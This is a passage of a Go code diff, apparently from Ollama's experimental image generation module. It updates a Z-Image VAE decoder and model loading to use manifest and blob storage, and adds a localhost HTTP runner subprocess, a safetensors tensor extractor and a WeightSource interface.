func (m *VAEDecoder) loadWeights(weights safetensors.WeightSource, cfg *VAEConfig) error {
|
||||
var err error
|
||||
|
||||
// Load conv_in
|
||||
fmt.Print(" Loading conv_in... ")
|
||||
@@ -596,20 +719,20 @@ func (m *VAEDecoder) Load(path string) error {
|
||||
m.ConvOut = NewConv2D(convOutWeight, convOutBias, 1, 1)
|
||||
fmt.Println("✓")
|
||||
|
||||
weights.ReleaseAll()
|
||||
return nil
|
||||
}
|
||||
|
||||
// Decode decodes latents to images.
|
||||
// Uses staged pools to free intermediate arrays and reduce peak memory.
|
||||
// Input latents are in NCHW format, output is in NCHW format.
|
||||
// Internally uses NHWC format (MLX native) for all operations.
|
||||
func (vae *VAEDecoder) Decode(latents *mlx.Array) *mlx.Array {
|
||||
var h *mlx.Array
|
||||
{
|
||||
z := mlx.DivScalar(latents, vae.Config.ScalingFactor)
|
||||
z = mlx.AddScalar(z, vae.Config.ShiftFactor)
|
||||
h = vae.ConvIn.Forward(z)
|
||||
mlx.Eval(h)
|
||||
}
|
||||
// Scale latents
|
||||
z := mlx.DivScalar(latents, vae.Config.ScalingFactor)
|
||||
z = mlx.AddScalar(z, vae.Config.ShiftFactor)
|
||||
// Convert NCHW -> NHWC for internal processing
|
||||
z = mlx.Transpose(z, 0, 2, 3, 1)
|
||||
h := vae.ConvIn.Forward(z)
|
||||
mlx.Eval(h)
|
||||
|
||||
h = vae.MidBlock.Forward(h)
|
||||
|
||||
@@ -617,36 +740,51 @@ func (vae *VAEDecoder) Decode(latents *mlx.Array) *mlx.Array {
|
||||
h = upBlock.Forward(h)
|
||||
}
|
||||
|
||||
{
|
||||
prev := h
|
||||
h = vae.ConvNormOut.Forward(h)
|
||||
h = mlx.SiLU(h)
|
||||
h = vae.ConvOut.Forward(h)
|
||||
// VAE outputs [-1, 1], convert to [0, 1]
|
||||
h = mlx.AddScalar(mlx.MulScalar(h, 0.5), 0.5)
|
||||
h = mlx.ClipScalar(h, 0.0, 1.0, true, true)
|
||||
prev.Free()
|
||||
mlx.Eval(h)
|
||||
}
|
||||
prev := h
|
||||
h = vae.ConvNormOut.Forward(h)
|
||||
mlx.Eval(h) // Eval after GroupNorm to avoid grid dimension issues
|
||||
h = mlx.SiLU(h)
|
||||
h = vae.ConvOut.Forward(h)
|
||||
mlx.Eval(h)
|
||||
|
||||
// VAE outputs [-1, 1], convert to [0, 1]
|
||||
h = mlx.MulScalar(h, 0.5)
|
||||
h = mlx.AddScalar(h, 0.5)
|
||||
h = mlx.ClipScalar(h, 0.0, 1.0, true, true)
|
||||
|
||||
// Convert NHWC -> NCHW for output
|
||||
h = mlx.Transpose(h, 0, 3, 1, 2)
|
||||
prev.Free()
|
||||
mlx.Eval(h)
|
||||
|
||||
return h
|
||||
}
|
||||
|
||||
// Upsample2x performs 2x nearest neighbor upsampling using broadcast.
|
||||
// x: [B, C, H, W] -> [B, C, H*2, W*2]
|
||||
// Upsample2x performs 2x nearest neighbor upsampling using Take.
|
||||
// Input and output are in NHWC format: [B, H, W, C] -> [B, H*2, W*2, C]
|
||||
// Uses Take with repeated indices to produce contiguous output.
|
||||
func Upsample2x(x *mlx.Array) *mlx.Array {
|
||||
shape := x.Shape()
|
||||
B := shape[0]
|
||||
C := shape[1]
|
||||
H := shape[2]
|
||||
W := shape[3]
|
||||
H := shape[1]
|
||||
W := shape[2]
|
||||
|
||||
// [B, C, H, W] -> [B, C, H, 1, W, 1]
|
||||
x = mlx.Reshape(x, B, C, H, 1, W, 1)
|
||||
// Broadcast to [B, C, H, 2, W, 2]
|
||||
x = mlx.BroadcastTo(x, []int32{B, C, H, 2, W, 2})
|
||||
// Reshape to [B, C, H*2, W*2]
|
||||
x = mlx.Reshape(x, B, C, H*2, W*2)
|
||||
// Create indices [0, 0, 1, 1, 2, 2, ...] for nearest neighbor
|
||||
// For H dimension
|
||||
hIdx := mlx.ArangeInt(0, H, 1, mlx.DtypeInt32)
|
||||
hIdx = mlx.Reshape(hIdx, H, 1)
|
||||
hIdx = mlx.BroadcastTo(hIdx, []int32{H, 2})
|
||||
hIdx = mlx.Reshape(hIdx, H*2)
|
||||
|
||||
// For W dimension
|
||||
wIdx := mlx.ArangeInt(0, W, 1, mlx.DtypeInt32)
|
||||
wIdx = mlx.Reshape(wIdx, W, 1)
|
||||
wIdx = mlx.BroadcastTo(wIdx, []int32{W, 2})
|
||||
wIdx = mlx.Reshape(wIdx, W*2)
|
||||
|
||||
// Take along H axis (axis 1 in NHWC)
|
||||
x = mlx.Take(x, hIdx, 1)
|
||||
// Take along W axis (axis 2 in NHWC)
|
||||
x = mlx.Take(x, wIdx, 2)
|
||||
|
||||
return x
|
||||
}
|
||||
|
||||
@@ -6,9 +6,9 @@ package zimage
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"path/filepath"
|
||||
"time"
|
||||
|
||||
"github.com/ollama/ollama/x/imagegen"
|
||||
"github.com/ollama/ollama/x/imagegen/cache"
|
||||
"github.com/ollama/ollama/x/imagegen/mlx"
|
||||
"github.com/ollama/ollama/x/imagegen/tokenizer"
|
||||
@@ -37,16 +37,16 @@ type ProgressFunc func(step, totalSteps int)
|
||||
|
||||
// Model represents a Z-Image diffusion model.
|
||||
type Model struct {
|
||||
ModelPath string
|
||||
ModelName string
|
||||
Tokenizer *tokenizer.Tokenizer
|
||||
TextEncoder *Qwen3TextEncoder
|
||||
Transformer *Transformer
|
||||
VAEDecoder *VAEDecoder
|
||||
}
|
||||
|
||||
// Load loads the Z-Image model from a directory.
|
||||
func (m *Model) Load(modelPath string) error {
|
||||
fmt.Println("Loading Z-Image model...")
|
||||
// Load loads the Z-Image model from ollama blob storage.
|
||||
func (m *Model) Load(modelName string) error {
|
||||
fmt.Printf("Loading Z-Image model from manifest: %s...\n", modelName)
|
||||
start := time.Now()
|
||||
|
||||
if mlx.GPUIsAvailable() {
|
||||
@@ -54,12 +54,34 @@ func (m *Model) Load(modelPath string) error {
|
||||
mlx.EnableCompile()
|
||||
}
|
||||
|
||||
m.ModelPath = modelPath
|
||||
m.ModelName = modelName
|
||||
|
||||
// Load tokenizer
|
||||
// Load manifest
|
||||
manifest, err := imagegen.LoadManifest(modelName)
|
||||
if err != nil {
|
||||
return fmt.Errorf("load manifest: %w", err)
|
||||
}
|
||||
|
||||
// Load tokenizer from manifest with config
|
||||
fmt.Print(" Loading tokenizer... ")
|
||||
tokenizerPath := filepath.Join(modelPath, "tokenizer", "tokenizer.json")
|
||||
tok, err := tokenizer.Load(tokenizerPath)
|
||||
tokData, err := manifest.ReadConfig("tokenizer/tokenizer.json")
|
||||
if err != nil {
|
||||
return fmt.Errorf("tokenizer: %w", err)
|
||||
}
|
||||
|
||||
// Try to read tokenizer config files from manifest
|
||||
tokConfig := &tokenizer.TokenizerConfig{}
|
||||
if data, err := manifest.ReadConfig("tokenizer/tokenizer_config.json"); err == nil {
|
||||
tokConfig.TokenizerConfigJSON = data
|
||||
}
|
||||
if data, err := manifest.ReadConfig("tokenizer/generation_config.json"); err == nil {
|
||||
tokConfig.GenerationConfigJSON = data
|
||||
}
|
||||
if data, err := manifest.ReadConfig("tokenizer/special_tokens_map.json"); err == nil {
|
||||
tokConfig.SpecialTokensMapJSON = data
|
||||
}
|
||||
|
||||
tok, err := tokenizer.LoadFromBytesWithConfig(tokData, tokConfig)
|
||||
if err != nil {
|
||||
return fmt.Errorf("tokenizer: %w", err)
|
||||
}
|
||||
@@ -68,7 +90,7 @@ func (m *Model) Load(modelPath string) error {
|
||||
|
||||
// Load text encoder
|
||||
m.TextEncoder = &Qwen3TextEncoder{}
|
||||
if err := m.TextEncoder.Load(filepath.Join(modelPath, "text_encoder")); err != nil {
|
||||
if err := m.TextEncoder.Load(manifest); err != nil {
|
||||
return fmt.Errorf("text encoder: %w", err)
|
||||
}
|
||||
mlx.Eval(mlx.Collect(m.TextEncoder)...)
|
||||
@@ -78,7 +100,7 @@ func (m *Model) Load(modelPath string) error {
|
||||
|
||||
// Load transformer
|
||||
m.Transformer = &Transformer{}
|
||||
if err := m.Transformer.Load(filepath.Join(modelPath, "transformer")); err != nil {
|
||||
if err := m.Transformer.Load(manifest); err != nil {
|
||||
return fmt.Errorf("transformer: %w", err)
|
||||
}
|
||||
mlx.Eval(mlx.Collect(m.Transformer)...)
|
||||
@@ -88,7 +110,7 @@ func (m *Model) Load(modelPath string) error {
|
||||
|
||||
// Load VAE decoder
|
||||
m.VAEDecoder = &VAEDecoder{}
|
||||
if err := m.VAEDecoder.Load(filepath.Join(modelPath, "vae")); err != nil {
|
||||
if err := m.VAEDecoder.Load(manifest); err != nil {
|
||||
return fmt.Errorf("VAE decoder: %w", err)
|
||||
}
|
||||
mlx.Eval(mlx.Collect(m.VAEDecoder)...)
|
||||
@@ -104,7 +126,7 @@ func (m *Model) Load(modelPath string) error {
|
||||
|
||||
// Generate creates an image from a prompt.
|
||||
func (m *Model) Generate(prompt string, width, height int32, steps int, seed int64) (*mlx.Array, error) {
|
||||
return m.GenerateFromConfig(&GenerateConfig{
|
||||
return m.GenerateFromConfig(context.Background(), &GenerateConfig{
|
||||
Prompt: prompt,
|
||||
Width: width,
|
||||
Height: height,
|
||||
@@ -115,7 +137,7 @@ func (m *Model) Generate(prompt string, width, height int32, steps int, seed int
|
||||
|
||||
// GenerateWithProgress creates an image with progress callback.
|
||||
func (m *Model) GenerateWithProgress(prompt string, width, height int32, steps int, seed int64, progress ProgressFunc) (*mlx.Array, error) {
|
||||
return m.GenerateFromConfig(&GenerateConfig{
|
||||
return m.GenerateFromConfig(context.Background(), &GenerateConfig{
|
||||
Prompt: prompt,
|
||||
Width: width,
|
||||
Height: height,
|
||||
@@ -127,7 +149,7 @@ func (m *Model) GenerateWithProgress(prompt string, width, height int32, steps i
|
||||
|
||||
// GenerateWithCFG creates an image with classifier-free guidance.
|
||||
func (m *Model) GenerateWithCFG(prompt, negativePrompt string, width, height int32, steps int, seed int64, cfgScale float32, progress ProgressFunc) (*mlx.Array, error) {
|
||||
return m.GenerateFromConfig(&GenerateConfig{
|
||||
return m.GenerateFromConfig(context.Background(), &GenerateConfig{
|
||||
Prompt: prompt,
|
||||
NegativePrompt: negativePrompt,
|
||||
CFGScale: cfgScale,
|
||||
@@ -140,9 +162,9 @@ func (m *Model) GenerateWithCFG(prompt, negativePrompt string, width, height int
|
||||
}
|
||||
|
||||
// GenerateFromConfig generates an image using the unified config struct.
|
||||
func (m *Model) GenerateFromConfig(cfg *GenerateConfig) (*mlx.Array, error) {
|
||||
func (m *Model) GenerateFromConfig(ctx context.Context, cfg *GenerateConfig) (*mlx.Array, error) {
|
||||
start := time.Now()
|
||||
result, err := m.generate(cfg)
|
||||
result, err := m.generate(ctx, cfg)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
@@ -160,7 +182,7 @@ func (m *Model) GenerateImage(ctx context.Context, prompt string, width, height
|
||||
}
|
||||
|
||||
// generate is the internal denoising pipeline.
|
||||
func (m *Model) generate(cfg *GenerateConfig) (*mlx.Array, error) {
|
||||
func (m *Model) generate(ctx context.Context, cfg *GenerateConfig) (*mlx.Array, error) {
|
||||
// Apply defaults
|
||||
if cfg.Width <= 0 {
|
||||
cfg.Width = 1024
|
||||
@@ -247,11 +269,19 @@ func (m *Model) generate(cfg *GenerateConfig) (*mlx.Array, error) {
|
||||
}
|
||||
|
||||
// Denoising loop
|
||||
if cfg.Progress != nil {
|
||||
cfg.Progress(0, cfg.Steps) // Start at 0%
|
||||
}
|
||||
for i := 0; i < cfg.Steps; i++ {
|
||||
stepStart := time.Now()
|
||||
if cfg.Progress != nil {
|
||||
cfg.Progress(i+1, cfg.Steps)
|
||||
// Check for cancellation
|
||||
if ctx != nil {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return nil, ctx.Err()
|
||||
default:
|
||||
}
|
||||
}
|
||||
stepStart := time.Now()
|
||||
|
||||
// GPU capture on step 2 if requested
|
||||
if cfg.CapturePath != "" && i == 1 {
|
||||
@@ -295,6 +325,7 @@ func (m *Model) generate(cfg *GenerateConfig) (*mlx.Array, error) {
|
||||
|
||||
noisePred := UnpatchifyLatents(output, tcfg.PatchSize, latentH, latentW, tcfg.InChannels)
|
||||
noisePred = mlx.Neg(noisePred)
|
||||
|
||||
oldLatents := latents
|
||||
latents = scheduler.Step(noisePred, latents, i)
|
||||
|
||||
@@ -313,6 +344,10 @@ func (m *Model) generate(cfg *GenerateConfig) (*mlx.Array, error) {
|
||||
peakMem := float64(mlx.MetalGetPeakMemory()) / (1024 * 1024 * 1024)
|
||||
fmt.Printf(" Step %d/%d: t=%.4f (%.2fs) [%.1f GB active, %.1f GB peak]\n",
|
||||
i+1, cfg.Steps, tCurr, time.Since(stepStart).Seconds(), activeMem, peakMem)
|
||||
|
||||
if cfg.Progress != nil {
|
||||
cfg.Progress(i+1, cfg.Steps) // Report completed step
|
||||
}
|
||||
}
|
||||
|
||||
// Free denoising temporaries before VAE decode
|
||||
|
||||
217
x/imagegen/runner/runner.go
Normal file
217
x/imagegen/runner/runner.go
Normal file
@@ -0,0 +1,217 @@
|
||||
//go:build mlx
|
||||
|
||||
// Package runner provides a subprocess server for image generation.
|
||||
// It listens on a port and handles HTTP requests for image generation.
|
||||
package runner
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"flag"
|
||||
"fmt"
|
||||
"log/slog"
|
||||
"net/http"
|
||||
"os"
|
||||
"os/signal"
|
||||
"path/filepath"
|
||||
"sync"
|
||||
"syscall"
|
||||
"time"
|
||||
|
||||
"github.com/ollama/ollama/x/imagegen"
|
||||
"github.com/ollama/ollama/x/imagegen/mlx"
|
||||
"github.com/ollama/ollama/x/imagegen/models/zimage"
|
||||
)
|
||||
|
||||
// Request is the image generation request format
|
||||
type Request struct {
|
||||
Prompt string `json:"prompt"`
|
||||
Width int32 `json:"width,omitempty"`
|
||||
Height int32 `json:"height,omitempty"`
|
||||
Steps int `json:"steps,omitempty"`
|
||||
Seed int64 `json:"seed,omitempty"`
|
||||
}
|
||||
|
||||
// Response is streamed back for each progress update
|
||||
type Response struct {
|
||||
Content string `json:"content"`
|
||||
Done bool `json:"done"`
|
||||
}
|
||||
|
||||
// Server holds the model and handles requests
|
||||
type Server struct {
|
||||
mu sync.Mutex
|
||||
model *zimage.Model
|
||||
modelName string
|
||||
}
|
||||
|
||||
// Execute is the entry point for the image runner subprocess
|
||||
func Execute(args []string) error {
|
||||
fs := flag.NewFlagSet("image-runner", flag.ExitOnError)
|
||||
modelName := fs.String("model", "", "path to image model")
|
||||
port := fs.Int("port", 0, "port to listen on")
|
||||
|
||||
if err := fs.Parse(args); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
if *modelName == "" {
|
||||
return fmt.Errorf("--model is required")
|
||||
}
|
||||
if *port == 0 {
|
||||
return fmt.Errorf("--port is required")
|
||||
}
|
||||
|
||||
slog.Info("starting image runner", "model", *modelName, "port", *port)
|
||||
|
||||
// Check memory requirements before loading
|
||||
requiredMemory := imagegen.EstimateVRAM(*modelName)
|
||||
availableMemory := mlx.GetMemoryLimit()
|
||||
if availableMemory > 0 && availableMemory < requiredMemory {
|
||||
return fmt.Errorf("insufficient memory for image generation: need %d GB, have %d GB",
|
||||
requiredMemory/(1024*1024*1024), availableMemory/(1024*1024*1024))
|
||||
}
|
||||
|
||||
// Load model
|
||||
model := &zimage.Model{}
|
||||
if err := model.Load(*modelName); err != nil {
|
||||
return fmt.Errorf("failed to load model: %w", err)
|
||||
}
|
||||
|
||||
server := &Server{
|
||||
model: model,
|
||||
modelName: *modelName,
|
||||
}
|
||||
|
||||
// Set up HTTP handlers
|
||||
mux := http.NewServeMux()
|
||||
mux.HandleFunc("/health", server.healthHandler)
|
||||
mux.HandleFunc("/completion", server.completionHandler)
|
||||
|
||||
httpServer := &http.Server{
|
||||
Addr: fmt.Sprintf("127.0.0.1:%d", *port),
|
||||
Handler: mux,
|
||||
}
|
||||
|
||||
// Handle shutdown
|
||||
done := make(chan struct{})
|
||||
go func() {
|
||||
sigCh := make(chan os.Signal, 1)
|
||||
signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM)
|
||||
<-sigCh
|
||||
slog.Info("shutting down image runner")
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||
defer cancel()
|
||||
httpServer.Shutdown(ctx)
|
||||
close(done)
|
||||
}()
|
||||
|
||||
slog.Info("image runner listening", "addr", httpServer.Addr)
|
||||
if err := httpServer.ListenAndServe(); err != http.ErrServerClosed {
|
||||
return err
|
||||
}
|
||||
|
||||
<-done
|
||||
return nil
|
||||
}
|
||||
|
||||
func (s *Server) healthHandler(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
json.NewEncoder(w).Encode(map[string]string{"status": "ok"})
|
||||
}
|
||||
|
||||
func (s *Server) completionHandler(w http.ResponseWriter, r *http.Request) {
|
||||
if r.Method != http.MethodPost {
|
||||
http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
|
||||
return
|
||||
}
|
||||
|
||||
var req Request
|
||||
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
|
||||
http.Error(w, err.Error(), http.StatusBadRequest)
|
||||
return
|
||||
}
|
||||
|
||||
// Serialize generation requests - MLX model may not handle concurrent generation
|
||||
s.mu.Lock()
|
||||
defer s.mu.Unlock()
|
||||
|
||||
// Apply defaults
|
||||
if req.Width <= 0 {
|
||||
req.Width = 1024
|
||||
}
|
||||
if req.Height <= 0 {
|
||||
req.Height = 1024
|
||||
}
|
||||
if req.Steps <= 0 {
|
||||
req.Steps = 9
|
||||
}
|
||||
if req.Seed <= 0 {
|
||||
req.Seed = time.Now().UnixNano()
|
||||
}
|
||||
|
||||
// Set up streaming response
|
||||
w.Header().Set("Content-Type", "application/x-ndjson")
|
||||
w.Header().Set("Transfer-Encoding", "chunked")
|
||||
flusher, ok := w.(http.Flusher)
|
||||
if !ok {
|
||||
http.Error(w, "streaming not supported", http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
// Generate image
|
||||
ctx := r.Context()
|
||||
img, err := s.model.GenerateFromConfig(ctx, &zimage.GenerateConfig{
|
||||
Prompt: req.Prompt,
|
||||
Width: req.Width,
|
||||
Height: req.Height,
|
||||
Steps: req.Steps,
|
||||
Seed: req.Seed,
|
||||
Progress: func(step, total int) {
|
||||
resp := Response{
|
||||
Content: fmt.Sprintf("\rGenerating: step %d/%d", step, total),
|
||||
Done: false,
|
||||
}
|
||||
data, _ := json.Marshal(resp)
|
||||
w.Write(data)
|
||||
w.Write([]byte("\n"))
|
||||
flusher.Flush()
|
||||
},
|
||||
})
|
||||
|
||||
if err != nil {
|
||||
// Don't send error for cancellation
|
||||
if ctx.Err() != nil {
|
||||
return
|
||||
}
|
||||
resp := Response{Content: fmt.Sprintf("error: %v", err), Done: true}
|
||||
data, _ := json.Marshal(resp)
|
||||
w.Write(data)
|
||||
w.Write([]byte("\n"))
|
||||
return
|
||||
}
|
||||
|
||||
// Save image
|
||||
outPath := filepath.Join(os.TempDir(), fmt.Sprintf("ollama-image-%d.png", time.Now().UnixNano()))
|
||||
if err := imagegen.SaveImage(img, outPath); err != nil {
|
||||
resp := Response{Content: fmt.Sprintf("error saving: %v", err), Done: true}
|
||||
data, _ := json.Marshal(resp)
|
||||
w.Write(data)
|
||||
w.Write([]byte("\n"))
|
||||
return
|
||||
}
|
||||
|
||||
// Free the generated image array and clean up MLX state
|
||||
img.Free()
|
||||
mlx.ClearCache()
|
||||
|
||||
// Send final response
|
||||
resp := Response{
|
||||
Content: fmt.Sprintf("\n\nImage saved to: %s\n", outPath),
|
||||
Done: true,
|
||||
}
|
||||
data, _ := json.Marshal(resp)
|
||||
w.Write(data)
|
||||
w.Write([]byte("\n"))
|
||||
flusher.Flush()
|
||||
}
|
||||
10
x/imagegen/runner/runner_stub.go
Normal file
10
x/imagegen/runner/runner_stub.go
Normal file
@@ -0,0 +1,10 @@
|
||||
//go:build !mlx
|
||||
|
||||
package runner
|
||||
|
||||
import "errors"
|
||||
|
||||
// Execute returns an error when not built with MLX support.
|
||||
func Execute(args []string) error {
|
||||
return errors.New("image generation not available: build with mlx tag")
|
||||
}
|
||||
176
x/imagegen/safetensors/extractor.go
Normal file
176
x/imagegen/safetensors/extractor.go
Normal file
@@ -0,0 +1,176 @@
|
||||
package safetensors
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"encoding/binary"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io"
|
||||
"os"
|
||||
"sort"
|
||||
)
|
||||
|
||||
// tensorInfo holds tensor metadata from safetensors headers.
|
||||
// This avoids depending on safetensors.go which requires the mlx tag.
|
||||
type tensorInfo struct {
|
||||
Dtype string `json:"dtype"`
|
||||
Shape []int32 `json:"shape"`
|
||||
DataOffsets [2]int `json:"data_offsets"`
|
||||
}
|
||||
|
||||
// TensorExtractor extracts individual tensors from a safetensors file.
|
||||
// It provides io.Reader interfaces for each tensor's raw data, enabling
|
||||
// streaming writes to blobs without loading entire tensors into memory.
|
||||
type TensorExtractor struct {
|
||||
file *os.File
|
||||
dataOffset int64 // Start of tensor data region
|
||||
header map[string]tensorInfo
|
||||
}
|
||||
|
||||
// TensorData holds tensor metadata and a reader for its raw bytes.
|
||||
type TensorData struct {
|
||||
Name string
|
||||
Dtype string
|
||||
Shape []int32
|
||||
Size int64
|
||||
reader *io.SectionReader
|
||||
}
|
||||
|
||||
// Reader returns an io.Reader for the tensor's raw bytes.
|
||||
func (td *TensorData) Reader() io.Reader {
|
||||
return td.reader
|
||||
}
|
||||
|
||||
// SafetensorsReader returns a reader that outputs the tensor wrapped in
|
||||
// minimal safetensors format. This allows using mlx_load_safetensors on
|
||||
// individual tensor blobs for native zero-copy loading.
|
||||
func (td *TensorData) SafetensorsReader() io.Reader {
|
||||
// Build minimal safetensors header with tensor named "data"
|
||||
header := map[string]tensorInfo{
|
||||
"data": {
|
||||
Dtype: td.Dtype,
|
||||
Shape: td.Shape,
|
||||
DataOffsets: [2]int{0, int(td.Size)},
|
||||
},
|
||||
}
|
||||
headerJSON, _ := json.Marshal(header)
|
||||
|
||||
// Pad header to 8-byte alignment
|
||||
padding := (8 - len(headerJSON)%8) % 8
|
||||
headerJSON = append(headerJSON, bytes.Repeat([]byte(" "), padding)...)
|
||||
|
||||
// Build header with size prefix
|
||||
headerBuf := new(bytes.Buffer)
|
||||
binary.Write(headerBuf, binary.LittleEndian, uint64(len(headerJSON)))
|
||||
headerBuf.Write(headerJSON)
|
||||
|
||||
// Return multi-reader: header + tensor data
|
||||
td.reader.Seek(0, io.SeekStart)
|
||||
return io.MultiReader(headerBuf, td.reader)
|
||||
}
|
||||
|
||||
// SafetensorsSize returns the total size of the safetensors-wrapped tensor.
|
||||
func (td *TensorData) SafetensorsSize() int64 {
|
||||
header := map[string]tensorInfo{
|
||||
"data": {
|
||||
Dtype: td.Dtype,
|
||||
Shape: td.Shape,
|
||||
DataOffsets: [2]int{0, int(td.Size)},
|
||||
},
|
||||
}
|
||||
headerJSON, _ := json.Marshal(header)
|
||||
padding := (8 - len(headerJSON)%8) % 8
|
||||
return 8 + int64(len(headerJSON)) + int64(padding) + td.Size
|
||||
}
|
||||
|
||||
// OpenForExtraction opens a safetensors file for tensor extraction.
|
||||
// The caller must call Close() when done.
|
||||
func OpenForExtraction(path string) (*TensorExtractor, error) {
|
||||
f, err := os.Open(path)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to open file: %w", err)
|
||||
}
|
||||
|
||||
var headerSize uint64
|
||||
if err := binary.Read(f, binary.LittleEndian, &headerSize); err != nil {
|
||||
f.Close()
|
||||
return nil, fmt.Errorf("failed to read header size: %w", err)
|
||||
}
|
||||
|
||||
headerBytes := make([]byte, headerSize)
|
||||
if _, err := f.Read(headerBytes); err != nil {
|
||||
f.Close()
|
||||
return nil, fmt.Errorf("failed to read header: %w", err)
|
||||
}
|
||||
|
||||
var header map[string]tensorInfo
|
||||
if err := json.Unmarshal(headerBytes, &header); err != nil {
|
||||
f.Close()
|
||||
return nil, fmt.Errorf("failed to parse header: %w", err)
|
||||
}
|
||||
|
||||
delete(header, "__metadata__")
|
||||
|
||||
return &TensorExtractor{
|
||||
file: f,
|
||||
dataOffset: 8 + int64(headerSize), // 8 bytes for header size + header content
|
||||
header: header,
|
||||
}, nil
|
||||
}
|
||||
|
||||
// GetTensor returns tensor metadata and a reader for extracting a single tensor.
|
||||
func (te *TensorExtractor) GetTensor(name string) (*TensorData, error) {
|
||||
info, ok := te.header[name]
|
||||
if !ok {
|
||||
return nil, fmt.Errorf("tensor %q not found", name)
|
||||
}
|
||||
|
||||
start := te.dataOffset + int64(info.DataOffsets[0])
|
||||
size := int64(info.DataOffsets[1] - info.DataOffsets[0])
|
||||
|
||||
return &TensorData{
|
||||
Name: name,
|
||||
Dtype: info.Dtype,
|
||||
Shape: info.Shape,
|
||||
Size: size,
|
||||
reader: io.NewSectionReader(te.file, start, size),
|
||||
}, nil
|
||||
}
|
||||
|
||||
// ListTensors returns all tensor names in sorted order.
|
||||
func (te *TensorExtractor) ListTensors() []string {
|
||||
names := make([]string, 0, len(te.header))
|
||||
for name := range te.header {
|
||||
names = append(names, name)
|
||||
}
|
||||
sort.Strings(names)
|
||||
return names
|
||||
}
|
||||
|
||||
// TensorCount returns the number of tensors in the file.
|
||||
func (te *TensorExtractor) TensorCount() int {
|
||||
return len(te.header)
|
||||
}
|
||||
|
||||
// Close closes the underlying file.
|
||||
func (te *TensorExtractor) Close() error {
|
||||
return te.file.Close()
|
||||
}
|
||||
|
||||
// ExtractAll returns TensorData for all tensors in the file.
|
||||
// Each TensorData has a reader that reads from the original file.
|
||||
// The caller must call Close() on the TensorExtractor when done.
|
||||
func (te *TensorExtractor) ExtractAll() ([]*TensorData, error) {
|
||||
names := te.ListTensors()
|
||||
tensors := make([]*TensorData, 0, len(names))
|
||||
|
||||
for _, name := range names {
|
||||
td, err := te.GetTensor(name)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
tensors = append(tensors, td)
|
||||
}
|
||||
|
||||
return tensors, nil
|
||||
}
|
||||
@@ -10,6 +10,14 @@ import (
|
||||
"github.com/ollama/ollama/x/imagegen/mlx"
|
||||
)
|
||||
|
||||
// WeightSource is an interface for loading weights.
|
||||
// Both ModelWeights (directory-based) and ManifestWeights (blob-based) implement this.
|
||||
type WeightSource interface {
|
||||
GetTensor(name string) (*mlx.Array, error)
|
||||
ListTensors() []string
|
||||
HasTensor(name string) bool
|
||||
}
|
||||
|
||||
// LoadModule loads weights into a struct using reflection and struct tags.
|
||||
//
|
||||
// Struct tags use the format: `weight:"path[,optional]"`
|
||||
@@ -31,7 +39,7 @@ import (
|
||||
// }
|
||||
//
|
||||
// err := LoadModule(&attn, weights, "model.layers.0")
|
||||
func LoadModule(dst any, weights *ModelWeights, prefix string) error {
|
||||
func LoadModule(dst any, weights WeightSource, prefix string) error {
|
||||
v := reflect.ValueOf(dst)
|
||||
if v.Kind() != reflect.Ptr || v.IsNil() {
|
||||
return fmt.Errorf("LoadModule: dst must be a non-nil pointer")
|
||||
@@ -51,7 +59,7 @@ func LoadModule(dst any, weights *ModelWeights, prefix string) error {
|
||||
}
|
||||
|
||||
// loadStruct recursively loads weights into a struct value.
|
||||
func loadStruct(v reflect.Value, weights *ModelWeights, prefix string, errs *[]string, parentOptional bool) {
|
||||
func loadStruct(v reflect.Value, weights WeightSource, prefix string, errs *[]string, parentOptional bool) {
|
||||
t := v.Type()
|
||||
|
||||
for i := 0; i < t.NumField(); i++ {
|
||||
@@ -136,7 +144,7 @@ func loadStruct(v reflect.Value, weights *ModelWeights, prefix string, errs *[]s
|
||||
}
|
||||
|
||||
// hasWeightsWithPrefix checks if any weights exist with the given prefix.
|
||||
func hasWeightsWithPrefix(weights *ModelWeights, prefix string) bool {
|
||||
func hasWeightsWithPrefix(weights WeightSource, prefix string) bool {
|
||||
for _, name := range weights.ListTensors() {
|
||||
if strings.HasPrefix(name, prefix+".") || name == prefix {
|
||||
return true
|
||||
@@ -146,7 +154,7 @@ func hasWeightsWithPrefix(weights *ModelWeights, prefix string) bool {
|
||||
}
|
||||
|
||||
// loadSlice loads weights into each element of a slice of struct pointers.
|
||||
func loadSlice(v reflect.Value, weights *ModelWeights, prefix string, errs *[]string) {
|
||||
func loadSlice(v reflect.Value, weights WeightSource, prefix string, errs *[]string) {
|
||||
elemStructType := v.Type().Elem().Elem()
|
||||
|
||||
for i := 0; i < v.Len(); i++ {
|
||||
|
||||
@@ -118,6 +118,34 @@ func LoadModelWeights(dir string) (*ModelWeights, error) {
|
||||
return mw, nil
|
||||
}
|
||||
|
||||
// LoadModelWeightsFromPaths loads weights from specific safetensor file paths.
|
||||
// Used for loading from blob storage where files are not in a directory.
|
||||
func LoadModelWeightsFromPaths(paths []string) (*ModelWeights, error) {
|
||||
mw := &ModelWeights{
|
||||
tensorFiles: make(map[string]string),
|
||||
tensorInfo: make(map[string]TensorInfo),
|
||||
nativeCache: make(map[string]*mlx.SafetensorsFile),
|
||||
}
|
||||
|
||||
for _, path := range paths {
|
||||
header, err := parseSafetensorHeader(path)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to parse %s: %w", path, err)
|
||||
}
|
||||
|
||||
for name, info := range header {
|
||||
mw.tensorFiles[name] = path
|
||||
mw.tensorInfo[name] = info
|
||||
}
|
||||
}
|
||||
|
||||
if len(mw.tensorFiles) == 0 {
|
||||
return nil, fmt.Errorf("no tensors found in provided paths")
|
||||
}
|
||||
|
||||
return mw, nil
|
||||
}
|
||||
|
||||
// Load loads all tensors into cache with the specified dtype.
|
||||
